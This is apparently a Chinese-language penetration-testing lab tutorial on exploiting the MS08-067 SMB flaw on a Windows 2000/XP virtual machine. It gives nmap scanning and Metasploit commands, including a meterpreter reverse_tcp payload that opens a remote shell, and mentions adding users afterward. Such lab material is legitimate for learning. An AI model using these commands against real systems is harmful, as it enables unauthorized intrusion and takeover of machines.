使用kali实践一个简单的winxp漏洞MS08_067

8-067漏洞演示与CVE-2017-11882漏洞复现

MS08_067漏洞是著名的远程溢出漏洞，影响除Windows Server 2008 Core以外的所有Windows系统，包括：Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本，甚至还包括测试阶段的Windows 7 Pro-Beta。本次实验就是metasploit利用ms08_067漏洞对win2000虚拟机进行渗透测试。

MS08_067是一个在windows445号端口上的漏洞，需要事先查看该端口是否开放，这里使用“nmap -PS 靶机ip”语句发现445号端口开放。因此可以使用MS08_067漏洞进行exploit。

（1）知道目标主机IP,在kali上用nmap扫描该主机信息

（2）kali打开metasploit，用它搜索ms08_067，可以得到具体 的漏洞信息

（3）漏洞利用

use  exploit/windows/smb/ms08_067_netapi

set payload windows/meterpreter/reverse_tcp

PS：show payloads :查看可以使用的payload 

        show targets ：查看可以攻击 的靶机

       show  options:查看使用的选项

设置对方目标主机ip, set rhost  xxxx

设置对方端口     set rport 445

设置自己主机   set  lhost xxx

设置系统信息，set target 7（具体可以通过show targets 查询） run 来实现  前提是对方得开了445端口

如果成功会显示信息，并且进入对方shell

可以通过常用命令来验证，例如sysinfo,net user add 等